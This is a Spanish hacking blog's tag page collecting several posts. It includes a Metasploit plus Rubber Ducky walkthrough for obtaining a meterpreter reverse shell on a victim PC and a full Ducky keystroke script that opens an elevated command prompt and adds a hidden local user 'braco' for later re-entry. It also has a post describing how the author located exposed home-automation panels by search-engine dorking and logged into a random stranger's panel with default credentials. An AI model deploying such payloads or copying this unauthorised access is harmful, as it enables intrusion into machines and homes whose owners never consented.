Mostrando entradas con la etiqueta Hardware. Mostrar todas las entradas
Mostrando entradas con la etiqueta Hardware. Mostrar todas las entradas

Metasploit & Rubber Ducky una Pareja Letal

Hola  tod@s

Todos conocemos el potencial que ofrece Metasploit, una gran herramienta para desarrollar y ejecutar exploits contra una máquina remota. Igualmente quien no ha jugado con el pato alguna vez, al utilizar este divertido producto podremos estar lanzando comandos en el PC víctima como si estuviéramos delante de él, ya que se trata en realidad de un teclado programado.
Imaginad ahora la combinación de ambos, se trata de una pareja letal, el test de penetración definitivo. 

Sin más dilaciones vamos a realizar la prueba de concepto.

En primer lugar debemos tener el script creado en ruby, el que creara una Shell “windows/meterpreter/reverse_tcp” que tantas veces hemos usado en Metasploit.

Ejecutamos el script, nos solicitará nuestra IP local y el puerto y automáticamente generará la shellcode.

Imagen 1: Ejecución del script en Ruby


En el siguiente paso tenemos que dejar a la escucha, ya que se ejecutará de forma totalmente automatizada el exploit/multi/handler y el payload. 

Imagen 2: Dejar a la escucha Handler


Es ahora turno del pato, en el paso anterior el script también nos creó un archivo de texto, tal que así.



Este archivo es el que convertiremos a continuación para inyectar en nuestro rubber ducky.

Imagen 3: Conversión del archivo


Tan sólo queda el último y gratificante paso, copiar el binario en el rubber ducky y pichar el pato en nuestra víctima, si todo ha ido bien veremos al pato trabajar y ejecutando el payload en el terminal de la víctima.

Imagen 4: Payload ejecutándose con éxito


En cuestión de segundos el pato y metasploit realizan su trabajo y tenemos una hermosa sesión de meterpreter.

Imagen 5: Sesión exitosa de meterpreter

Como podemos observar en la imagen anterior la computadora LAB-PC es nuestra, tenemos control total sobre ella. Sin duda es una combinación para un test de penetración, ya que usamos el potencial de metasploit con la rapidez y el vector del rubber ducky.

No seáis malos. 

Mi Pato y Yo 2ºParte

Hola a tod@s

Hoy traemos el segundo capítulo de la cadena de artículos sobre Rubber Ducky. En el primer capítulo creamos un sencillo payload, simplemente el compañero se dejaba el PC sin bloquear y le dejábamos un bonito mensaje en un txt en su desktop. 

Para este segundo capítulo queríamos darle un giro más de tuerca y crear un payload un poco más sofisticado. Con este payload podremos crearnos una cuenta de usuario en la máquina víctima y entrar más tarde, ya sea por acceso remoto, o bien con acceso físico, ;)

A continuación el código necesario para crear este payload:

  1. REM addlocaluser
  2. DELAY 5000
  3. GUI r
  4. DELAY 50
  5. STRING powershell Start-Process cmd -verb runas
  6. ENTER
  7. DELAY 200
  8. ENTER
  9. DELAY 200
  10. STRING net user braco 1234 /add
  11. ENTER
  12. DELAY 200
  13. STRING exit
  14. ENTER

La utilización de Rubber Ducky es sencilla, se puede enumerar en los siguientes pasos:
  1. Primer paso será crear el payload en un archivo de texto.
  2. Segundo paso será encodear el archivo de texto.
  3. Tercer paso será cargar el binario creado en la tarjeta de memoria de Rubber Ducky.
  4. Cuarto paso pinchar el Rubber Ducky en el PC víctima.
Como una imagen vale más que mil palabras, os dejo con el video, recordad que estos videos estarán disponibles en nuestro Canal de Youtube o en próximos artículos, no olvidéis suscribiros al canal de Youtube, así como feed y demás redes sociales para estar al tanto de las novedades .


No seáis malos.

PD: Este artículo no habría sido posible sin la inestimable colaboración de @kioardetroya

Mi Pato y Yo 1ºParte

Hola a tod@s

Hoy será el primero de una cadena de artículos sobre Rubber Ducky. No vamos a volver a explicar que es Rubber Ducky, este pato de goma de apariencia inofensiva, ya hablamos de él en la cadena de artículos dedicados a Juguetes Hacking


En este primer capítulo veremos un payload muy sencillo, tan sólo habré un editor de texto y escribe un mensaje.


A continuación el código necesario para crear este payload:

  1. DELAY 3000
  2. GUI r
  3. DELAY 500
  4. STRING notepad
  5. DELAY 500
  6. ENTER
  7. DELAY 750
  8. STRING Te dejaste le pc sin bloquear :D hackeado by Estación Informática
  9. ENTER


La utilización de este pato es muy sencilla, se puede enumerar en los siguientes pasos:
  1. Primer paso será crear el payload en un archivo de texto.
  2. Segundo paso será encodear el archivo de texto.
  3. Tercer paso será cargar el binario creado en la tarjeta de memoria de Rubber Ducky.
  4. Cuarto paso pinchar el Rubber Ducky en el PC víctima.

Como una imagen vale más que mil palabras, os dejo con el video, recordad que estos videos estarán disponibles en nuestro canal deYoutube o en próximos artículos.



No seáis malos.

Memoria USB de Concienciación



Hola a tod@s


Te levantas por la mañana, sueño, prisas, pruebas, informes, reuniones, etc. Tu mente está saturada, encima no tienes a mano un pendrive que necesitas, pero al llegar a tu mesa, encuentras una unidad USB en tu mesa. ¿Qué harías?



En pruebas de ingeniería social se utiliza a veces un pendrive infectado con un keylogger, también apareció a escena rubber ducky con su apariencia de pendrive. Ahora van aún más lejos y sacan al mercado un USB que quema el puerto.


Este USB Killer tiene un diseño con apariencia “normal” de un pendrive, pero tras esa apariencia esconde un fondo oscuro, algunos lo han bautizado como “Memoria USB de Concienciación"


Cómo veis, ya no sólo está en juego la seguridad de los datos de vuestros pc´s por el robo de información de un pendrive infectado, ahora también podrán “joder” el puerto del pc.


Cuidado con los pendrive que os encontréis por ahí. Estáis avisados.


No seáis malos.

Kano el regalo perfecto para niños


Hola a tod@s

¿Nunca habéis estado dudando en que comprar a los más peques de la casa?

Aunque ya hemos pasado el día de reyes, aún tenemos la posibilidad de regalar en algún cumpleaños o comunión de un sobrino, primo, hijos de amigos o para los que ya seáis papas a vuestros niños.


Un regalo innovador y educativo para que el crío y tú alucinéis como es Kano, con un sistema operativo de código abierto para la exploración, la creación y reproducción. Montañas de código de en Minecraft y powerups en Pong. Música de sintetizador y stream de video. Sumérgete en la línea de comandos inventando algo nuevo.

El pack se completa con una scard, caja transparente, stickers para decorar, usb wifi, cable hdmi y teclado.

No seáis malos.

Más información, menos passwords por defecto



Hola a tod@s


El otro día al llegar a casa, tras concluir la jornada laboral, me puse a buscar proyectos interesantes que me inspiran para sacarle más partido a mi Pi. Tras la búsqueda dí con Pi Home, se trata de un proyecto de automatización del hogar con la Raspberry Pi.


Un proyecto interesante en el que domotizar su casa, pudiendo automatizar una impresora, la radio o las lámparas de las habitaciones. Todo esto controlado desde una aplicación web.
Antes, os dejo un video del proyecto, para que entréis en materia.

 



Fue aquí, cuando mi mente llena vulnerabilidades y demás historias pense lo que solemos pensar los que nos dedicamos a este mundillo, ¿y si? ¿cómo funciona?


Me dispuse a realizar una búsqueda de Hacking con buscadores.

Imagen1: Busqueda




El objetivo era el panel de administración de este proyecto, la búsqueda relevo muchos falsos positivos.

Imagen 2: Panel de administración

 

Probamos con un panel al azar, ¿será este el típico caso de credenciales por defecto? un poco de hacking con buscadores y ¡bingo! encontré la password por defecto.


Imagen 3: Configuración de lamparas

Imagen 4: Configuración de lamparas 




Vuelvo a reiterar al igual que hice en otros post, no vale de nada la seguridad que implementéis si después dejáis las contraseñas por defecto.


No seáis malos.